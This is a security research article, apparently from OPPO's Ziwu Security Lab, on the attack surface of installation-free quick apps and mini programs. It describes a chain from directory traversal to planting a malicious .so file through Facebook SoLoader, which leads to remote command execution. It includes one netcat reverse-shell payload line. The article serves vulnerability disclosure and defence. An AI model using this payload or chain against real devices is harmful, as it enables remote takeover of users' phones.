1. Background Introduction

With the advent of the 5G era, Internet information has exploded, and mobile applications have gradually become bulky and complex. On the one hand, ordinary consumers will download clients less and less, and most of their needs need to be met in a lighter way. On the other hand, every super APP or mobile phone manufacturer wants to gather more content ecologically. . As a result, installation-free apps such as "quick apps" came into being.

This year, OPPO Zi Meridian Lab shared the research and analysis results for installation-free applications at the Black Hat Asia Black Hat Conference. How to call from ordinary interface to remote command execution of application permissions, we will do this in more detail in this article Analysis.

BlackHat is a global cyber security conference founded by the legendary hacker Jeff Moss in 1997. It is known as the "Oscar" of the hacker world. It is held in the United States, Europe, and Asia each year as a top event in the global information security industry. Since its inception, it has attracted the attention and participation of many global companies, government agencies, top security vendors, and research organizations every year.

2. Introduction to Architecture

Installation-free application architectures are diverse, but as a whole, they can be divided into two different factions: mobile operating system vendors and platform-based application vendors.

Mobile operating system manufacturer
Foreign operating system manufacturers represented by Google and Apple make full use of the advantages of platforms, and it is also convenient for developers to quickly get started. The traditional Android and iOS applications are modularized, and the structure and development language requirements are unchanged. Applications can be based on actual conditions. Load on demand, which greatly reduces the user's waiting time, and realizes the effect of "free of installation".

Google InstantApp and Apple AppleClips are more of a "temporary application" role for Android and iOS, so the operating system will restrict the data and permissions that they can access. For example, in iOS, AppleClips cannot freely exchange data with other applications, and can only share data with its own corresponding full-app (full-app); AppleClips cannot perform background services, nor can it access the address book, file management, SMS and other sensitive users. Data and even notifications will be automatically revoked after 8 hours of application.

platform-based application vendor
Platform-based application vendors are prominently represented in China, such as the fast application platform, WeChat, and Alipay created by the nine major domestic Android mobile phone manufacturers. This type of platform application fully absorbs the advantages of traditional H5 applications and combines them with the mobile application JS-Bridge.

The fast app/small program engine is actually very similar to the browser’s multi-process architecture. Our web front-end application is packaged and run on the engine. Different fast apps/small programs run in different processes and do not interfere with each other. As a middleman, the engine is responsible for the fast application/small program code interpreter on the one hand, and on the other hand, it is also a two-way bridge for the communication between the fast application/small program and the operating system kernel and the underlying hardware.

3. Attack surface analysis

The length of the attack methods of Google InstantApp and Apple AppleClips is limited, so I won’t repeat them here. The following mainly analyzes the attack surface of fast apps/mini programs that are more commonly used by domestic users.

As shown in the overview of the architecture in the figure below, there are many data interaction processes between the business server, the engine server, the engine, the native Android/iOS application, the operating system, and the underlying hardware, and the engine seems to be built on Android/iOS. The micro OS on the Internet supports and manages the normal operation of the fast application/small program ecosystem.

3.1 View from the application download startup process

During the package download process, there are two attack paths. If the manufacturer does not use strict HTTPS transmission, the attacker can replace the data during the download process and send the malicious content back to the client; in addition, if the manufacturer temporarily downloads the package to the mobile phone External storage, malicious applications can also seize this opportunity to replace, of course, this also depends on the engine does not do file verification on the package.

3.2 Looking at the interface provided by the engine

Whether it is a small program or a quick application, it provides many interfaces for calling the system or the underlying hardware. From taking pictures and recording to operating the file system, many interfaces hide huge security risks. The whole can be classified into the following categories:
1) Sensor or hardware call type: battery, Bluetooth, NFC, screen, keyboard, accelerometer, compass, etc.

For such interfaces that do not contain user sensitive data, what we need to pay attention to is authorization, whether quick apps/small programs can call interface capabilities without authorization or once-authorize for permanent authorization;

2) File system: create files/directories, download files, upload files, delete files/directories, decompress files, etc.
The file system directly interacts with the Android/iOS operating system, which has a high risk and requires more attention, as follows:

  1. Authorization, quick apps/small programs need user authorization to call the interface to read and write the file system;
  2. The scope of the operable file system, whether the operable root directory of the quick app/small program is restricted to a specific directory under the private directory;
  3. Whether the interface judges whether the directory traversal symbol ../, whether the download file interface or the decompression interface can traverse the directory and jump out of the operable file system;
  4. The interface may call C++ functions or system functions at the bottom layer, whether it can inject malicious strings to execute commands or delete unexpected directory files.

3) Platform features: real-name authentication, advertising, application downloads, card coupons, red envelopes, account system, payment, etc.

This type of interface that interacts with the server is more of a business logic vulnerability. We need to pay attention to whether these interfaces are verified on the client side. Even a step in the entire verification process may cause great harm.

Real-name authentication, payment and other interfaces, client verification may bypass the child mode control or payment system to achieve local cracking;

Billing interfaces such as advertisements and app downloads, and whether quick apps/small programs can bypass billing or swipe the amount;

4) Operating system calls: camera, recording, application jump, data storage, notification, WebView, clipboard, contacts, calendar, etc.

Operating system calls involve sensitive user information. In addition to the above authorization, we need to pay attention to:

  1. Whether the interface can continue to run in the background, such as recording and taking pictures;
  2. Can WebView open any URL and carry the identity information field;
  3. Whether the application jump range is controllable, and which protocols are supported;
  4. Whether the location of data storage is safe, and whether other fast apps/small programs or native apps can be tampered with;

3.3 From the bottom of the engine

The engine itself is composed of logic code JavaScript parsing engine, WebView component, picture audio and video decoding component, JS to C++/Swift/ObjcC system call library, etc.

1) Let’s first talk about the JS engine. The JS engines used by different platforms and vendors are different, but they are always based on V8 or JavaScriptCore. The fast application/small program engine first preprocesses and structure the JS files, and then submits them to the JS engine. Perform optimized execution.

AppletsFast application
AndroidX5 kernel/UC kernelV8 engine
iOSJavaScriptCore---

That is to say, if we insert the V8/JSC exploit code in the logic code layer of the applet/quick application, that is, the js file of the applet and the ux file of the quick application, and wait for the engine to parse and execute it, it can cause file reading and writing or even Order execution, of course, the specific effect depends on different vendors' mitigation measures for JS engine vulnerabilities.

2) Picture audio and video decoding components

nameComponentWhether there are historical CVE vulnerabilities
AudioMediaBrowserCompat、FFmpeg...unknown
JPG/JPEGlibjpeg-turbo、...exist
videoMediacodec、libstagefright、FFmpeg...exist

Quick app/small program supports a variety of image format analysis, audio and video playback, live broadcast, etc. In addition to relying on the underlying components of the operating system, it may embed many custom dynamic link libraries, and many dynamic link libraries such as libjpeg-turbo, FFmpeg has historical CVE vulnerabilities, and fuzzing of these libraries is also more convenient, so this is a potential attack surface of the fast application/small program engine.

4. From directory traversal to remote command execution

As we mentioned in the second chapter, the file system is a highly-authorized interface provided by the engine, and a little carelessness can cause command execution, etc., so we set out from this established goal to see if the directory can be realized in the fast application Traverse.

Quick app implements more file read and write operation APIs, such as:

access(object)
appendFile(object)
mkdir(object)
readFile(object)
rename(object)
readdir(object)
...

If you want to achieve a remote attack, we need to download and write files from the network to the victim's device. Naturally, we first try to use one of the interfaces to traverse to lib-main and write the dynamic link library lib-xxx.so

After testing on the real machine, we successfully wrote the malicious so file loading library:

Then why do we want to write the so file to this directory? Then we need to mention one thing-Facebook SoLoader.

SoLoader is a So file loading library launched by facebook. It encapsulates System.loadLibrary and can handle the dependencies of So files.

When React Native application is first started, SoLoader will /data/data/package_name create a lower lib-main folder and extract the apk file to which the So according to the rules.

In this way, we can let the engine load our malicious so file loading library to achieve the effect of local command execution:

shell.so 执行 => system("/system/bin/toybox nc 192.168.1.153 1233 | /system/bin/sh  &");


But to realize remote command execution is far from enough, the victim needs to open the target fast application and restart the fast application engine a second time. We know that Quick App supports QR code, deeplink, NFC, etc. to open the application, so the entire exploit chain is as follows:

As long as the user clicks on the hap scheme link or touches the NFC device, we can implement remote command execution.

5. Summary and Outlook

The attack surface and vulnerability exploitation methods of free-install applications mentioned in this article may be just the tip of the iceberg, but free-install applications are the future development trend of mobile applications. The cross-platform feature is not only widely used in mobile terminals, but also started to be carried in new energy vehicles. Among the car-machine systems of the company, it may be seen in industrial control, medical, and wearable equipment in the future. The potential power of its vulnerabilities cannot be underestimated.

6. Reference link

[1] https://www.infoq.cn/article/huawei-quickapp-engine-architecture
[2] https://github.com/facebook/SoLoader

Author profile

Zhiyang OPPO Ziwu Security Lab Cyber Security Engineer
OPPO Ziwu Security Lab was established in 2019. With the mission of "protecting users' safety and privacy, and injecting security genes into brands", it continues to focus on business security, red-blue confrontation, AIoT security, Android security, data and privacy protection and other fields. Deeply cultivate safety offensive and defensive research and R&D system safety construction.

Get more exciting content, scan the code and follow the [OPPO Digital Intelligence Technology] public account


OPPO数智技术
612 声望950 粉丝